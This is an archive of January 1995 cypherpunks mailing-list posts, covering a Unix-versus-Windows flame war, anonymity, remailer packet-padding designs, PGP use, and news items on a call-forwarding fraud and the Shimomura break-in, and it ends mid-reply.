- posting pseudonymously to cypherpunks and engaging them in spurious flame
  argument might seem like fun to someone hostile to the anoynimity agenda
  and a way of generating a case that "see, anonymous/pseudonymous use of
  the internet angers even cypherpunks"

James, if you *do* exist, I suggest you shut up now before someone you may
want to work for reads your idiot posts.  As for me, I am enforcing my own
opinion that you do not exist by entering your "address" in my filter file.
Goodbye.

Those of you who care about flame wars can read the following bounced msg:

> Date: Fri, 27 Jan 95 18:50 EST
> From: <MAILER-DAEMON@passport.ca>
> To: craig
> Subject: mail failed, returning to sender
> Reference: <m0rY0Qb-0002HEC@forged.passport.ca>
> Content-Type: text
> Content-Length: 1980
> 
> |------------------------- Failed addresses follow: ---------------------|
>  jamesd@com.informix.com ... unknown host
> |------------------------- Message text follows: ------------------------|
> Received: by forged.passport.ca (Smail3.1.29.1 #5)
> 	id m0rY0Qb-0002HEC; Fri, 27 Jan 95 18:50 EST
> Message-Id: <m0rY0Qb-0002HEC@forged.passport.ca>
> From: craig (Craig Hubley)
> Subject: Re: Oops, Correction: one big error in "Even more unix holy war."
> To: jamesd@com.informix.com
> Date: Fri, 27 Jan 1995 18:50:09 -0500 (EST)
> In-Reply-To: <9501272119.AA00461@carbon.informix.com> from "jamesd@com.informix.com" at Jan 27, 95 01:19:01 pm
> X-Mailer: ELM [version 2.4 PL23]
> MIME-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
> Content-Length: 1203      
> 
> > Unix has no equivalent of App Studio, etc.  I have made
> 
> Nonsense.  What about UIM/X, InterViews screen painter,
> and the many cross-platform toolkits (C++Views, Visix
> Galaxy, Neuron Data Client/Server Elements, Zinc, Zapp,
> and now Taligent... for that matter what about NextStep?
> And the increasing number of Smalltalk tools ?)
> 
> > a little tour of people in my company who work on both
> > unix and Windows.  I (fortunately) work primarily on
> > Windows, as you may have guessed.
> 
> I *did* guess, but never mind how.  :-)
>  
> > Most of my correspondents had replies along the lines
> > of "Huh -- internationalization -- what source code
> > tools could possibly help you with internationalization."
> 
> Zinc runs off a special purpose OODB.  Translating a GUI 
> from one language to another is a matter of setting a flag
> at runtime... everything switches from English into Spanish
> or whatever.
>  
> > James A. Donald
> 
> Sorry James, your opinions on this matter are line noise. Posts
> with this subject and your name on them will be ignored.  Please
> consult the various FAQs on Unix programming and crossplatform
> toolkits before wasting bandwidth with this pure nonsense again.
> 
> So much for your free education.
> 
> Craig
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 27 Jan 95 17:12:26 PST
To: craig@passport.ca (Craig Hubley)
Subject: Re: anonymous mailing
In-Reply-To: <m0rY0ml-0002H4C@forged.passport.ca>
Message-ID: <199501280110.UAA12579@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| You seem to think that anoynimity can be separated from privacy itself.
| Anoynimity was an accidental feature of the telephone system that was
| only recently eliminated.  Now, it seems, that those who seek control
| over others have realized that it could be eliminated in other media
| as well (why not routinely fingerprint everyone, and dust all postal
| mail for fingerprints? More practically, why not earmark every transaction
| on the Reuters feed?  Or credit every article in the Economist?).  But
| even these fundamental disruptions to basic institutions are dwarfed by
| the threat to individual confidence to speak out and not fear retribution,
| in a world with so many laws that everyone is breaking one or another...

	The Economist is written anonymously becuase it prevents
"Dan Rather syndrome."


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 27 Jan 95 17:39:14 PST
To: craig@passport.ca (Craig Hubley)
Subject: Re: Shut up already - James Donald does not even exist...
In-Reply-To: <m0rY1W7-0002H4C@forged.passport.ca>
Message-ID: <m0rXxTV-0009v9C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> James Donald does not exist.  We can stop the flame war now.  Trying to
> be a good net.citizen, I sent "him" e-mail to correct one of "his" line-
> noise-quality opinions quietly (so he might shut up) - has no one else
> tried this?  It bounced, failing to resolve host which does not usually
> happen here if the site is real.  So I submit the following as evidence
> that "he" does not exist:

jamesd@netcom.com is in the header sometimes and doesn't bounce.
Why he has a bogus address he didn't explain adequately.  (This was
in a private exchange in addition to the public one.  I deleted
cypherpunks and he didn't notice for a couple messages until I
pointed it out.  If you want the whole collection...)

> - no living human being could hold such opinions and simultaneously operate
>   his vital organs (i.e. the level of intelligence implied by his "opinions"
>   is even lower than that necessary to support breathing and digestion)

HAHAHAHAHA ROFL!

> - posting pseudonymously to cypherpunks and engaging them in spurious flame
>   argument might seem like fun to someone hostile to the anoynimity agenda
>   and a way of generating a case that "see, anonymous/pseudonymous use of
>   the internet angers even cypherpunks"

Thought of that... Reasonably good if so.  Too far from 1Apr though.


OK, now how about that Pascal vs. C war...  (Ahhhh... I didn't mean it!)

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Fri, 27 Jan 95 20:30:12 PST
To: perry@imsi.com
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <9501280307.AA20529@snark.imsi.com>
Message-ID: <m0rY4lE-0004IKC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> "James A. Donald" says:
> > I know what a Locale is:
> 
> You've shown no indication that you do.
> 
> > The fact that you confuse this with the internationalization
> > problem shows that most unix folk have no tools for this problem,
> 
> Vigorous insistance doesn't change the truth, James.
> 
> > In Unix each company seems to have its own hand rolled tools
> > to accomplish this task, or no tools at all -- they do it
> > by hand.
> 
> We don't have symbolic debuggers either, as I recall.

Why don't you guys take this private little war TO EMAIL???  I don't want
to hear it on the list.  Hitting 'g' instead of 'r' only makes you guys
look like idiots instead of spreading your witty little remarks all over
the net.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 27 Jan 95 22:01:17 PST
To: cypherpunks@toad.com
Subject: Even more unix holy wars.
Message-ID: <199501280600.WAA25615@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@com.informix.com wrote:
>but in unix you type:
>   find . -name filename -print

This assumes the find command actually works ;) Find doesn't follow
symbolic links, which renders it mostly useless.  It doesn't follow
symbolic links to avoid falling in a infinite cycle.

Of course, any second year computer science student can devise an
algorithm that follows symbolic links and detects when it is in a
cycle, to escape.

The unix philosophy "small is beautiful" <--> "when faced with a choice,
cop out and take the easy route"

This is all well documented in "The Unix Hater's Guide."

How would I go around undeleting a file under Unix?  It's easy on the
Mac.  Doing it under DOS is ugly, but it works.  But with unix, there
is no way.  More productivity has been lost because of accidental
erasure under unix than was lost dealing with the internet worm, than
all security breaches combined.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 19:08:40 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <Pine.3.89.9501271848.A29134-0100000@netcom10>
Message-ID: <9501280307.AA20529@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> I know what a Locale is:

You've shown no indication that you do.

> The fact that you confuse this with the internationalization
> problem shows that most unix folk have no tools for this problem,

Vigorous insistance doesn't change the truth, James.

> In Unix each company seems to have its own hand rolled tools
> to accomplish this task, or no tools at all -- they do it
> by hand.

We don't have symbolic debuggers either, as I recall.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 27 Jan 95 22:26:30 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy wars.
Message-ID: <199501280625.WAA28228@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
>Did I mention that DOS used to make you use EDLIN out of the box?

Did I mention that UNIX used to make you use ED out of the box?

> that Unix is somehow harder to use than DOS.

Of course it isn't.  Train somebody under BSD (say using csh/tcsh/zsh)
and they are totally prepared to get to work under ksh/bash/sh under
SVR4.  The commands are the same and so are the options, on say things
like ps.  NOT.

Unix commands are powerful and easy to use.  For example, to kill a
process I have to use "ps -aux" or "ps -ef" depending on which flavor
of unix I'm running, note the process id, and do a "kill -9 id".  Why
can't I kill a job by name (i.e. I can do a "fg %emacs" but not a
"kill %emacs".)  

Unix is filled with design abortions like this.

> that X is harder to use than Windows 

How about better Windows software is available?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Fri, 27 Jan 95 20:34:40 PST
To: cypherpunks@toad.com
Subject: Philadelphia CyberCrime
Message-ID: <bESAlKJXYXWJ078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Heard on the news today that they arrested a plumber and are holding
him in lieu of $50,000 bail.

He used a PC to crack into the phone system and set up 'Ultra' call
forwarding which forwarded calls to other plumbers businesses to his.
He then took the calls and told the callers that his company was
covering for the one they actually called.

Personal opinion: while I think the guy did steal business from the
other firms, they authorities are trying to find the customers he
'defrauded'.  If they were happy with the work, I don't think they
were actually defrauded.  The other companies did lose income and
I think he should be prosecuted for that, but $50,000 bail seems a
little excessive given the crime.
End Personal opinion.

- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLynFCGvyi8p8VUiJAQFbfwQAq1OimjQvAyOdspvRSIBOApdEryeEXlSf
9YJ0wZAvuSHWxjkJpgapQKwAQxb4kkpJi6BvXqrnMjCWpkc9t5eMwr6Cc7XZUJea
wmYaS19KcSfmgp0x4vJW0QwISR2GDgwyKH0oSz1+uWMTdHka5B70KVsQomnVgUww
8VK0bIrq/Fo=
=I4iQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@netcom.com (Allen B. Ethridge)
Date: Fri, 27 Jan 95 21:17:06 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <ab4f82f600021004c795@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>I am writing this under sun's unix imitation of Microsoft's
>and Apples GUI.  I am using their almost acceptable ASCII editor.
>
>I leave a window open for a long time.
>
>Then I attempt close down the window, an operation that I can
>do in Microsoft Windows with a single double click.  In unix
>I click on the border to bring to popup a menu, carefull drag
>to the right point on the menu, then release.  In addition
>the menu names are confusing.  If you want to minimize a
>window you have to "close" it.  If you want to cause a window
>to cease to be, you have to "quit" it -- Hey did I not already
>quit it when I forgot about it and went to do something else.
>
>
>A warning message comes up:  I have not saved.  I am offered the
>options of quiting or not quitting.
>
>Gee guys, did it never occur to the great unix gurus that at
>this point the option that the user most likely wants to do
>is save the file.  How come the number one most common option
>is not in the message box.


I think you've confused whatever poorly designed GUI you've chosen
to use with UNIX.  The GUI on my workstation at work doesn't behave
like this.  It's not as intuitive as my Mac, but it does bear a
rather frightening resemblance to the Windows system that my brother
has on is Compaq.

Unix isn't a GUI, or even a UI.  It's an operating system.  And it
performs that function better than most.

        allen


allen@well.sf.ca.us          It's dangerous, child, to come to conclusions
ethridge@netcom.com          when you don't have any facts.
my opinions are my own       Dr. Hemlock, The Eiger Sanction






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfloyd@io.com
Date: Fri, 27 Jan 95 21:27:33 PST
To: cypherpunks@toad.com
Subject: OSS status
Message-ID: <199501280527.XAA08156@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


Just when I almost get a prototype for the offsite secure storage 
(OSS) program working, I have to hit the self-destruct lever...

The site I was having my test for the OSS suddenly became hostile.  To keep
things from getting worse, I deleted all stuff from there.  It will be a
week or two getting the bug fixes in (I backed it up a week ago...), and
some time until I find a site that I consider 'non-hostile' to work on.

Currently the commands follow the pattern of Remailer-net with the
two colons meaning a pasted header, and two or three commands (Store,
Retrieve, Delete) for the files.

Work is slow due to the fabled Job Hunt (tm).  I appreciate your patience.

Douglas R. Floyd
PGP key fingerable from keyservers.  Note new key as of 1/1/95.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Fri, 27 Jan 95 21:17:40 PST
To: cypherpunks@toad.com
Subject: Re: anonymous mailing
Message-ID: <199501280513.AAA14436@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501280110.UAA12579@bwh.harvard.edu>,
Adam Shostack <adam@bwh.harvard.edu> wrote:
>	The Economist is written anonymously becuase it prevents
>"Dan Rather syndrome."

You mean getting beat up by randoms screaming "What's the frequency,
Kenneth?"
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLymZfhNhgovrPB7dAQGIOgP/UYbdUbAzhhsqwzQ8FVZzcKFaxPHed6Zk
uu/m7ShxcS1/Ok1KPLf0a4S3E1jGLsyfrZwCaFAJTTViMO1Cq/BgNaY9TE3lhqZT
Zx7zPDgaJJVQhDw34X62vD5lFRWmxqgn8mdgyQ+/G4x7TJom1jbIeQgpfwObB0Hq
62OK1R+I/6M=
=lYEA
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLynSWyoZzwIn1bdtAQGCSQGAoc8P9J6Ffg9FQwiJgZDT8IlGkRot2UNv
IOdE6m8xWJTn8U68u6TBUcc0Z/ldLjpg
=FG1N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Sat, 28 Jan 95 00:15:44 PST
To: cypherpunks@toad.com
Subject: alt.religion.your.operating.system.sucks
Message-ID: <9501280817.AA15280@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text


I mean no disrespect, but the attrocities commited by the aged
masters who wrote most of the operating systems are well documented.
I have run into this line of thinking in many occasions (my <insert 
compiler or operating system> is better than yours...), although it
it seems to be more of a sore spot to those who love thier compiler/
interpreter.  Most of these observations are made out of ignorance.
I get paid for programming under NT, windows, MS-DOS, VMS, RSX, and
UNIX, not insulting the designers or users.

Additionally, I deal with other people in other companies who love
thier AS/400s and IBM mainframes.  Hell there is even several programmers
here who go misty-eyed everytime the word Amiga is mentioned.
I bet there is even someone out there who believes that he/she could
write a GUI operating system in COBOL (if someone has accomplished this
I would love to see the punch cards...).

UNIX is a programmers environment.  It is very flexible, and you can
do just about anything you want to, provided you have the ability.  Spawning
processes and child processes are trivial, and much more efficent compared
to windows-NT and VMS.  Additionally, I don't know of too many operating 
systems where the source code is floating around.  I mean so what if 
it doesn't come with a pretty shrink wrapped package and a thick 
getting-started, if you have a question just go find the source code.  
Geez.  

And as far as a GUI, most of my work revolves around plain old ASCII.
X windows may be "standard" now, but it didn't stop SUN, DEC, etc., from
making their own proprietary (errr.. I mean "optimized") versions.  
I don't know why there is so much whining about:    

 - My GUI interface sucks
 - Your GUI interface sucks
 - Your mother's interface sucks.

I see no reason to puke up this garbage other people.
 
VMS is more secure (interlock intrusion detection, etc.), but any 
operating system is only as strong as its users/administrators.  The one
thing I do not like about VMS is the way the system libraries are 
structured, but such is life.  I was not consulted when DEC was designing
the operating system.  Thier Xwindows system needs some work, but it does
work.

NT is cool (if you are running on a 300MHz Sable).  I think it is
something special when you can run UNIX, Windows, and OpenVMS applications
simultaniously on the same box.  Can your operating system do that? 
Hell, for $3500 you can by a 166MHz alpha that will do this.

System 7 is great.  I just didn't like it.  I didn't like the way
I was isolated from the hardware, forced to take what the designers
thought I needed.  Just my preference.  Besides, Apple equipment was,
and still is overpriced (I should know I used to own several).

Windows isn't a true multitasking operating system, and besides its like
the old joke, Q: "how do you turn a 486/66 into a 286?" A: "run windows!". 
But like it or not, it is here to stay.  I do like programming under windows
over dos, simply because it is a pre-emptive operating system and forces
the programmers to write structured code (for the most part) to intercept
the messages.  But the serial driver code sucks.

PDP-11/RSX.  Ewwwwww..

MS-DOS.  If you want to write fast graphics, assembly is the way to go.
Windows just can't keep up.  Sure Micro$oft released win-G, but what's the
point.  Your operating system is so much better than mine are, as is your
keyboard, your mouse, etc.,

My point is that every operating system, programming language, or whatever
has benefits and detracting points.  If you want to continue this discussion,
I will be more than happy to create a list for it,.. then you can rant until
you fingers are bloody.

-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for PGP KEY.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sat, 28 Jan 95 05:25:18 PST
To: cypherpunks@toad.com
Subject: Secure (!?) Remailer Net
Message-ID: <Pine.3.89.9501280738.A18649-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
    Maybe I'm way behind the curve on this, but...
 
    The traffic analysis that we've seen so far mainly just documents
tcmay's "everybody a remailer" concept.  If you look, you will notice that
these analyses all assume that Alice and Bob are _not_ remailers
themselves, and for a good reason.  If Alice and Bob _are_ remailers,
analysis of the type used here is worthless, especially if Alice and Bob
have a policy of not sending any mail unless they first receive garbage,
and of sending out garbage whenever they get a letter.
 
    HOWEVER, the analysis makes another assumption--that messages are
indistinguishable.  This assumption does not correlate, as I understand it,
with the current remailer net.
 
    There are, as I see it, a couple of modifications that (I think) would
not impose to great a burden on our longsuffering coders, and, as a side
benefit, might allow more flexibility in other matters as well.
 
    Standard packet sizes, as I see it, are not very difficult to
implement, with a couple of assumptions.  (I now assume that all traffic is
intra-remailer-net)
 
    First, the message is signed with the sender's key.  (More on that
later.)
 
    Suppose a signed message to be forwarded is smaller than the standard
packet size.  The sending remailer adds a Cutmarks:  header.  At the end of
the message, the cutmark is added, followed by sufficient garbage to fill
out the standard packet size.  The message is then pgp'ed to the recipent
_with COMPRESS = OFF_.
 
    Upon receipt, the message is decrypted, and its origination can then be
triply verified (at least).  From: line, packet size, and PGP signature.
Since the message claims to be from a packeting remailer, the packet size
should be the standard one.  The recipient now has the message that was
sent to it.  This message is probably itself encrypted, so it can be
handled (almost) as if this message were just received.  This includes
stripping the garbage and (probably) decrypting the message to get the
forwarding information.
 
    Note that this system would allow the extropian remailer to be
compatible with Matt Ghio's alias system.  (Right now, the remailer doesn't
like separate pgp packets, or packets it can't read, or something.) Under
the current system, the precausion is entirely warranted.
 
    To make life even more fun, there is no good reason that non-remailers
cannot be in on the action!  Alice, sending to Bob through Chaum, pretends
to be a remailer.  That is, she prepares her message to Bob, (encrypted),
and adds the Request-Remailing-To:  Bob@nowhere.org, and signs it.  She
then observes that the message is too small, so she adds the Cutmarks:
header, etc.  When Chaum receives the packet, he opens it, removes the
cutmarks, and sees a signature he does not know.  Chaum then sends a
request to pgp-key-server@omniscient.gov for the key, and holds the message
until he gets it.  He then compares the address and name on the key
recieved to the message.  The signature is good, so he is ready to send the
packet to Bob.  But Bob can be in on the game as well, since there is no
reason that he cannot handle the Cutmarks:, the signature, and the nested
encryption.  In fact, Alice could include a copy of Bob's key in the
message for Chaum to use, after a Recipient-Key:  header.  Bob can also
verify that the message was actually routed through Chaum.  If Chaum is
concerned that, at some future time, Eve might supeona his key ring in
order to demonstrate that Alice and Bob are using Chaum, Chaum can
alternately request keys that he does not need from the servers, and delete
(older) keys in the ring.
 
    In other words, if all the remailers can handle nested pgp packets and
cutmarks, we are close to moving all small messages to a standard size.
 
    What if the file is too big?
 
    If the file is too big, break it in pieces.  We need a header,
Multipart Message:  n of m.  Note that since this is assumed to be _inside_
a pgp wrapper, it is secure.  The recipient could hold and merge the files
as needed.  If the message to be forwarded is too big, split and continue.
Since the messages are ascii armored, the split/combine protocal is to
concatenate.  Message parts could be made equal size to minimize the chance
of a message barely bumping over the limit as it moves.  Of course, Alice
could break her message to Bob directly, but we cannot assume that all
would do this for us.
 
    This also means that if Alice sends a message to Bob in the clear
through Chaum, and David, that the message will be encrypted from Chaum to
David.  Thus, if Eve wants to know which message from Chaum to David is the
one from Alice to Bob, (perhaps to know that it is _not_ the message from
Frank she is interested in) she knows only that it was one of the messages
from Chaum to David after Chaum got the message from Alice, and before
David sent it to Bob.  While Chaum and David can both read the message, it
still provides mixing capabilites inside the remailer net itself, and thus,
some protection to Frank.  (Who apparently needs the help.)
 
    A word on remailer keys:  Since pgp uses square-and-multiply for
exponentiation, we see that the amount of work needed to sign a message is
d(m) * (d(e) + o(e)) where d(m) is the digits of the modulous, d(e) digits
of the exponent, and o(e) is the number of ones in e.  (I don't remember
the technical term.) Since the public key is small, each of the parts of
the private key will be large, BUT, there is no reason to assume that we
cannot get lucky, and find an m such that d(e) + o(e) is much smaller than
expected, (d(m) * 3/2, roughly) thus greatly reducing the system demand of
the remailer.  In fact, it might be possible to move to 768-bit keys for
those that have kept their sizes down in the past.  If pgp handles each
prime separately, we look for a double-lucky modulous.  (And a source of
random numbers that does not involve striking keys!)
 
    Cypherpunks come up with really neato ideas for somebody ELSE to
code...  (Sorry guys, but I've not figured out how to get Unix/TCP/etc
working on my Amiga...yet...)
 
 
    By the way, the following key id's are showing on the list, but are not
on the servers:  27D5B76D 231C7021 34ED427F E37385DD.  The first is the
auto-signer at bb.hks.net.  Also, my modem isn't too thrilled with my
connection these days, If the signature fails, look for obvious errors in
the text.  Sorry.
 
 
    "PGP?"                      "ITAR!"                      "Oh, RKBA!"
 
 
                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLym3unmgMs8UcStNAQEAZggAlIsw7HDs4V2GU3DQo7Fx5TiRO6+6mW2B
7Qjn6I+CY1URQQbA3bhPvYoJUt2o3DJ0BCLRej03L/7mdRJmqS3f/1m+juflqPm7
oKlonwpOpFNg2kFSzjE4IpAgIcgi7tHgaLKsIfQ4+QO3s4pJdwAf8VMBHGLyWd2Z
h9mNaKgUeKHjhHys2zATm6FNMipcAQgU8sFOl4/YIGyso+cfj4iSXAK4NM4tolDZ
uca7l6bQdW5vwRjCJhNmKo+GuSHCY/QczbZZ9R5SkE58LrOVj1MY2x3qcg6gD04X
Veddx83tLLsvnh02psRkWH+n0tv7GP8s8cle1ziJcgT96DrQIW6qMw==
=t9x5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 28 Jan 95 06:03:18 PST
To: cypherpunks@toad.com
Subject: NYT on Target Shimomura
Message-ID: <199501281402.JAA17350@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff writes today on security expert Tsutomu Shimomura, the target
of the break-in Markoff wrote about on Monday. 
 
 
For email copy send blank message with subject:  TSU_shi 
 
 
Here's an excerpt: 
 
 
   Mr. Shimomura, one of the country's most skilled computer 
   security experts, is the person who prompted a Government 
   computer agency to issue a chilling warning on Monday. 
   Unknown intruders, the agency warned, had used a 
   sophisticated break-in technique to steal files from Mr. 
   Shimomura's own well-guarded computer in his home near San 
   Diego. And the stealth and style of the attack indicated 
   that many of the millions of computers connected to the 
   global Internet network could be at risk. There have been 
   at least four other known victims so far, including 
   computers at Loyola University of Chicago, the University 
   of Rochester and Drexel University in Philadelphia. 
 
 
   Since Monday, as the F.B.I. has continued to investigate 
   the crime and look for evidence of break-ins elsewhere, Mr. 
   Shimomura has been answering telephone calls and E-mail 
   from government, corporate and university computer 
   administrators seeking advice on how to arm themselves. 
   Between replies, he has been working feverishly to perfect 
   a new type of protective software that would thwart the 
   burglars. Once it is finished, he intends to distribute the 
   software free over the Internet. 
 
 
   But more than anything else, Mr. Shimomura, who is 30, 
   wants to help the Government catch the crooks. And while he 
   acknowledges that the thieves were clever, Mr. Shimomura 
   has also uncovered signs of ineptitude that he says will be 
   the intruders' eventual undoing. 
 
 
   "Looks like the ankle-biters have learned to read technical 
   manuals," Mr. Shimomura said derisively. "Somebody should 
   teach them some manners. " 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Sat, 28 Jan 95 07:59:04 PST
To: cypherpunks@toad.com
Subject: Encrypted Magazine Subscriptions Via E-Mail?
Message-ID: <POcAlOwsc-G3077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I posed this question in alt.wired. Am I missing something obvious as to
why Wired (or magazines in general) don't do this to make subscribing
easier?
=========================================================================
Why doesn't Wired if it is sooooooo hooked in the online culture have a
PGP public key that 'net users could use to send in their credit card
numbers for subscriptions?

Its a hell of alot easier than mailing in a cheque or money order. And just
as safe. Wired could have an electronic "form" you could request for them,
to which the public key is attached. You type in the info on the form (ie
name, address, phone number, credit card number etc etc) and encrypt it
and send it to their e-mail address for subscriptions.

Wired then fires off a followup message to the e-mail address from which it
came. Obviously if the address bounces, then the subscription is cancelled.
Or it can also snailmail a subscription  confirmation to the persons adress.

Whatever. I just think it would be an easier, on-line way of doing things.
They could use Via Crypt, the commercial PGP version, in keeping with
the widespread use of PGP on the net.
===========================================================================

Personally, I think that IF major enterprises like Wired would use a PGP
application in subscriptions it would contribute greatly to the use of
PGP awareness on the 'net. And that I thought was one of the cypherpunk
items on the agenda.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLypnMHBFBj7pSNyhAQFFCQf/SWuPYA4oPtm4Q0eoavJ5wPiaIzLZTOwE
0K75TfUKFbCD3r9gKKR/KauwiClERWmOWYsGjL8sI2LYABRlYeONaSdCCxdtbUfa
um40Y0fsEo8v7xgxZnIozRHvCCb8TqWCxLTmJ/sg8DRGd5L907eiBmoRRB4lPuqJ
Hqmp9NbrTxo06qu3Bm2PdhNaJKQjDtBQ/tMN/yeQI3oHk/eMFuWkByW52PpWTE7q
WZfAZKSXuTQtWyHygaH8hkN3Bcwhtno6ncYSaIRXsQ0KvtwwowMGqFi3Mbuza6SV
MCoQTLjWFEgmY3WmkKVv0MptUT2ZcrvqtowoxcytARzdXjHJJ+WCNA==
=qva1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 28 Jan 95 11:51:43 PST
To: cypherpunks@toad.com
Subject: Re:  Secure (!?) Remailer Net
Message-ID: <199501281951.LAA03940@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Nathan Zook <nzook@bga.com>
>     The traffic analysis that we've seen so far mainly just documents
> tcmay's "everybody a remailer" concept.  If you look, you will notice that
> these analyses all assume that Alice and Bob are _not_ remailers
> themselves, and for a good reason.  If Alice and Bob _are_ remailers,
> analysis of the type used here is worthless, especially if Alice and Bob
> have a policy of not sending any mail unless they first receive garbage,
> and of sending out garbage whenever they get a letter.

Realistically, though, everybody is not a remailer, and there are no
prospects of everybody becoming a remailer anytime soon, so the analyses
of Wei and others are certainly relevant.

>     HOWEVER, the analysis makes another assumption--that messages are
> indistinguishable.  This assumption does not correlate, as I understand it,
> with the current remailer net.

Mixmaster is supposed to do splitting and, I think, padding.  I hope to
have time to look at it soon.  It sounds very good.

>     First, the message is signed with the sender's key.  (More on that
> later.)

I did not see why this should be done.

>     Suppose a signed message to be forwarded is smaller than the standard
> packet size.  The sending remailer adds a Cutmarks:  header.  At the end of
> the message, the cutmark is added, followed by sufficient garbage to fill
> out the standard packet size.  The message is then pgp'ed to the recipent
> _with COMPRESS = OFF_.

A better approach IMO is to embed the message length in the encrypted
information (as PGP does) and pad with cryptographic random garbage
(which PGP could be patched to do).

>     Upon receipt, the message is decrypted, and its origination can then be
> triply verified (at least).  From: line, packet size, and PGP signature.
> Since the message claims to be from a packeting remailer, the packet size
> should be the standard one.  The recipient now has the message that was
> sent to it.  This message is probably itself encrypted, so it can be
> handled (almost) as if this message were just received.  This includes
> stripping the garbage and (probably) decrypting the message to get the
> forwarding information.

Why does the remailer care where the message came from?  What difference
does that make?  I can see the final recipient caring about the original
sender, so a PGP sig makes sense at that level, but why at each hop?

>     Note that this system would allow the extropian remailer to be
